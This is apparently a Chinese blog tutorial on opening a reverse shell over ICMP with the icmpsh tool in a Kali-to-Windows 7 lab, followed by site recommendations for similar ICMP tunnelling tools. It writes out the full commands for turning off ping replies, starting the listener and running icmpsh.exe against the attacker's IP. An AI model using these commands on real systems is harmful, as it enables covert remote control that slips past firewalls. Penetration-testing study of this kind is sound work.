ICMPSH的学习ICMP反弹shell

最新推荐文章于 2022-09-12 18:24:51 发布
最新推荐文章于 2022-09-12 18:24:51 发布
阅读量1.3k 收藏 7
点赞数 1
分类专栏: 后渗透、内网学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/106537762
版权

ICMP隧道

最常见的ping命令就是利用的ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。

实验环境

Kali 192.168.10.144 win7 192.168.10.129

kali安装好icmpsh工具
root@kali:~# git clone https://github.com/inquisb/icmpsh.git
安装icmpsh的依赖包
root@kali:~# apt-get install python-impacket

执行之前最重要的一步是在你的机器上关闭ping回复。这样可以防止内核自己对ping包进行响应。
root@kali:~# sysctl -w net.ipv4.icmp_echo_ignore_all=1
在这里插入图片描述然后把icmpsh.exe上传到win7机中。

Kali执行操作:
python icmpsh_m.py 本机ip 目标ip
root@kali:~/icmpsh# python icmpsh_m.py 192.168.10.144 192.168.10.129

win7直接icmpsh.exe -t 攻击机ip
在这里插入图片描述
Kali就可以接受一个icmp反弹回来的shell
在这里插入图片描述
最后不要忘记把1改为0
在这里插入图片描述

努力的学渣'#
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
icmp-remote-shell:使用ICMP协议进行数据隐藏的隐写术远程Shell的原型
05-14
ICMP远程外壳 使用ICMP协议进行数据隐藏的隐写术远程Shell的原型。 要安装数据包,请使用pip: pip install icmp_remote_shell Packet提供了一些可以在您的ICMP隐写术项目中使用的常用功能: 校验和-计算数据包校验和 send_one_ping-发送一个ICMP数据包 send_one-和以前一样,但是更方便 start_sniffing-启动ICMP数据包嗅探器 Packet还提供用于创建远程Shell的命令行工具。 icmp-remote-shell-client -ICMP远程Shell客户端 用法: icmp-remote-shell-client host_out host_in [ping_delay] [log_file] 在哪里: host_out-发送请求的接口 host_in-侦听答复的界面 ping_de
浅谈内网工具ICMP的使用以及遇到的坑
markecheng的博客
11-26 1039
内网渗透之隐藏通信隧道ICMP协议以及ICMP工具的使用 ICMP的使用简介 -t host :要向其发送ping请求的主机ip地址。此选项是必需的! -r:发送一个包含字符串“Test1234”的测试icmp请求,然后退出。这是用来测试连接的。 -d milliseconds:请求之间的延迟(毫秒) -o milliseconds:毫秒响应超时(毫秒)。如果没有及时收到回复,奴隶将增加一个空白计数器。如果计数器达到某个限制,则从机将退出。如果收到响应,计数器将被设置回0。 -b num :空白数限制(退出
Linux下 运行py文件Operation not permitted:解决
qq_28048941的博客
06-21 1925
Operation not permitted解决
linux下运行python没有反应_解决Linux下运行Python脚本显示“: 没有那个文件或目录”的问题...
weixin_36149595的博客
02-07 2557
解决Linux下运行Python脚本显示“:没有那个文件或目录”的问题我猜不少人都遇到过类似的问题:在Windows下写好了一个python脚本,运行没问题但放到Linux系统下就必须在命令行前加上一个python解释器才能运行脚本开头的注释行已经指明了解释器的路径,也用chmod给了执行权限,但就是不能直接运行脚本。比如这个脚本:#!/usr/bin/envpython#-*-coding...
linux 脚本执行没反映,linux – 如果脚本没有运行,如何检查和运行脚本?
weixin_39977642的博客
04-30 259
我创建了一个非常简单的脚本,名为main_start_script,它将在后台运行2个python程序,代码为:python /opt/cuckoo/cuckoo-2/cuckoo.py 1>cuckoo_script/cuckoo_start.txt 2>&1 &python /opt/cuckoo/cuckoo-2/utils/web.py 1>cuckoo_...
icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记
weixin_39872257的博客
12-01 338
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 十篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。ICMP隧道‍ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下...
ICMP Shell-开源
05-01
ICMP Shell(ISH)是类似于telnet的协议。 它允许用户连接到远程主机,并仅使用ICMP来发送和接收数据,从而打开外壳。 ICMP Shell是用C语言编写的,用于UNIX环境。
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。...但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
icmpdoor:用Python 3和Scapy编写的ICMP Reverse Shell(backdoorrev shell
05-07
icmpdoor是用Python3和scapy编写的ICMP rev shell。 已在Ubuntu 20.04,Debian 10(Kali Linux)和Windows 10上进行测试。 Python版本用法(Windows和Linux): ./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command...
Shell over ICMP-开源
05-02
Soicmp是类似于telnet或netcat的远程shell系统,它允许用户使用ICMP协议而不是传统的TCP连接到远程shell守护程序。 http://soicmp.sourceforge.net/ http://billiejoex.altervista.org/Prj_Py_soicmp.shtml
icmp反弹协议——icmpsh
weixin_50683638的博客
04-08 334
ICMP隧道 前言 一、ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 内容 开启两台虚拟机这里用到的是kali和
隐藏通信隧道技术之icmpsh反弹shell(网络层ICMP隧道)
bring_coco的博客
01-05 771
优势:不需要开放端口就能通信 常见ICMP的消息是ping命令,通过ping可以得到一些回复 如果HTTP,DNS正反向端口转发不行时候可以尝试ICMP隧道 建立基础:只要能ping通,可以将TCP/UDP数据封装到数据包中,然后利用ping的数据包来穿透防火墙。 实验环境: 1.虚拟机中进行 (kali作为外网机器,monowall1是分隔内外网的防火墙,win7,win2012是两台内网机器) 2.kali的ip:10.0.78.29 Monowall1的ip:1.1.1.1 Win7的ip:1.1.
nishangICMP反弹shell攻击日志分析
weixin_44253823的博客
11-08 636
ICMP包一般不被防火墙拦截,使用ICMP协议作为连接容易通过防火墙。 攻击过程复现。 复现环境 win7:192.168.0.73。powershell导入nishang框架。https://blog.csdn.net/weixin_44253823/article/details/102972355 kali:192.168.0.162。安装icmpsh工具。 https://gi...
通过ICMP协议反弹SHELL并执行命令
Fly_鹏程万里
05-23 3624
前言内网中的大多数系统都位于防火墙和企业代理之后,以便控制入口以及出口流量。防火墙可以拦截到反连的shell,但ICMP协议基本上是不拦截的。因此,为了获得shell并在目标主机上执行命令,可以使用ICMP协议作为隐藏通道进行连接。使用icmpsh(https://github.com/inquisb/icmpsh)工具可用来执行此攻击。推特上的大牛@Bernardo Damele已经将其导入到他...
ICMP隧道技术 - icmpsh
shawdow_bug的博客
09-12 959
ICMP隧道工具 icmpsh 使用。
内网渗透系列:内网隧道之icmpsh
闵行小鱼塘
04-10 1387
本文研究ICMP隧道的一个工具,icmpsh
icmpshicmp反弹shell
weixin_45729208的博客
03-31 326
一,技术原理 向ping www.baidu.com时,本机会先向百度的服务器发送ICMP请求包,如果请求成功了,则百度服务器会回应ICMP的响应包 引用百度百科: ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 二,实验环境 攻击机
icmpsh解决运行报错
weixin_30655219的博客
11-22 540
运行./run.sh报错 sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null python icmpsh_m.py 攻击机ip 目标机ip 目标机运行:icmpsh.exe -t 攻击机ip -d 500 -b 30 -s 128 转载于:https://www.cnblogs.com/websecyw/p/10001...
利用icmpsh建立icmp隧道反弹shell
xj28555的博客
09-25 735
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git 我们可以直接用git克隆过来git clonehttps://github.com/inquisb/icmpsh.git 然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问 pip2 install impacket 接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。 sysc.
windows 反弹shell
最新发布
07-29
此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值